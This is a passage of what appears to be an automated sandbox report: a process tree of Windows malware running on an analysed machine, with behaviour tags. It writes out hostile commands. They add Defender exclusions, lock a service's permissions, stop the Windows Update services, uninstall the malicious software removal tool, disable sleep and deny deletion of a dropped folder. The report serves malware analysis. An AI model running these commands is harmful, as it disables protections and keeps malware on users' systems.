                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 992 -ip 992
                                                                                                          1⤵
                                                                                                            PID:3496
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 992 -ip 992
                                                                                                            1⤵
                                                                                                              PID:4440
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
                                                                                                              1⤵
                                                                                                                PID:4036
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 992 -ip 992
                                                                                                                1⤵
                                                                                                                  PID:5076
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 992 -ip 992
                                                                                                                  1⤵
                                                                                                                    PID:1156
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AA0B.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\AA0B.exe
                                                                                                                    1⤵
                                                                                                                      PID:2704
                                                                                                                    • C:\Windows\windefender.exe
                                                                                                                      C:\Windows\windefender.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:4696
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                                      1⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2460
                                                                                                                    • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                      C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                      1⤵
                                                                                                                        PID:4256
                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                          2⤵
                                                                                                                            PID:3416
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            explorer.exe
                                                                                                                            2⤵
                                                                                                                              PID:4364
                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                                              2⤵
                                                                                                                                PID:4604
                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                2⤵
                                                                                                                                  PID:932
                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                  2⤵
                                                                                                                                    PID:2868
                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                    2⤵
                                                                                                                                      PID:1432
                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                      2⤵
                                                                                                                                        PID:2192
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:1176
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2456
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:4060
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:1916
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                        2⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2168
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        2⤵
                                                                                                                                          PID:4436
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:2704
                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        1⤵
                                                                                                                                          PID:4932
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2700
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                              2⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              PID:2780
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Users\Admin\AppData\Local\ad444082-f4b8-4a6d-992f-793edc7f4d66" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:1416
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\D216.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                3⤵
                                                                                                                                                  PID:3416
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D216.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\D216.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5056
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 568
                                                                                                                                                      5⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2908
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5056 -ip 5056
                                                                                                                                              1⤵
                                                                                                                                                PID:4136
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D91C.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D91C.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1436
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 552
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4648
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 572
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4524
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 680
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4996
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 680
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:2416
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1056
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4636
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1072
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4084
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1104
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:1104
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1436 -ip 1436
                                                                                                                                                1⤵
                                                                                                                                                  PID:1944
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1436 -ip 1436
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2192
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1436 -ip 1436
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4268
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1436 -ip 1436
                                                                                                                                                      1⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:4256
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1436 -ip 1436
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4756
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1436 -ip 1436
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2180
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4128 -ip 4128
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1152
                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                            timeout /t 5
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1852
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\tffiuru
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\tffiuru
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:2700
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F139.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F139.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:1884
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4572
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1436 -ip 1436
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3332
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2680
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 992 -ip 992
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4252
                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                    explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies Installed Components in the registry
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:3328
                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3328 -s 6064
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3384
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4960
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies Installed Components in the registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:3416
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:436
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1312
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4088
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4664
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4340
                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 572 -p 4088 -ip 4088
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3288
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:996
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:212
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3684
                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3236
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4368
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3732
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4280
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4360
                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:732
                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5012
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3508
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2680
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3620
                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4740
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:1820
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:64
                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                      explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3220
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3656
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4048
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2876
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3876
                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2124
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4924
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3540
                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4168
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:2008
                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:3180
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 992 -ip 992
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4524
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5060
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:3508
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5060
